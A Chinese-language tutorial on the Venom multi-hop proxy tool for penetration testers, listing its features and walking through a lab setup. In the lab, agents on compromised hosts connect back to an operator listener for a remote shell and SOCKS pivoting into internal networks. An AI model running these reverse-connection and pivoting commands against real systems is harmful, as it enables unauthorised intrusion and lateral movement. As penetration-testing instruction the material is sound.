一、Venom简介：

Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具，可将多个节点进行连接，然后以节点为跳板，构建多级代理，渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网，并轻松地管理代理节点。

特性：

l可视化网络拓扑

l多级socks5代理

l多级端口转发

l端口复用 (apache/mysql/...)

lssh隧道

l交互式shell

l文件的上传和下载

l节点间通信加密

l支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)

二、Venom使用实验：

help（所有支持的功能）：

①单层网络环境情况：

1、服务端开启监听：

./admin_linux_x64 -lport 888

2、客户端连接：

agent.exe -rhost 192.168.136.144 -rport 888

3、连接成功就会多出一个node：

goto 1

即可进入到节点已连接的节点：

4、一些内置的功能：

交互式shell：

shell

socks代理：

socks 1080

然后配置服务端ip:1080即可使用socks代理

还有一些其他的功能，看help命令即可，操作也是十分简单的，就不演示了

②多层网络环境：

工具支持以节点为跳板，构建多级代理

网络环境：已经拿到A主机的node，内网中存在B主机，不能出网，只能连接A主机

1、在A主机监听777端口

Listen 777

2、B主机连接A监听的777端口

agent.exe -rhost 192.168.137 -rport 777

可以看到多出了个node2

show

操作作节点2：

goto 2

还有更复杂的网络环境也是类似操作，在能被目标连接的node中监听端口，然后再连接node监听的端口即可完成多层网络代理，并且一台机器的node可以监听多个不同的端口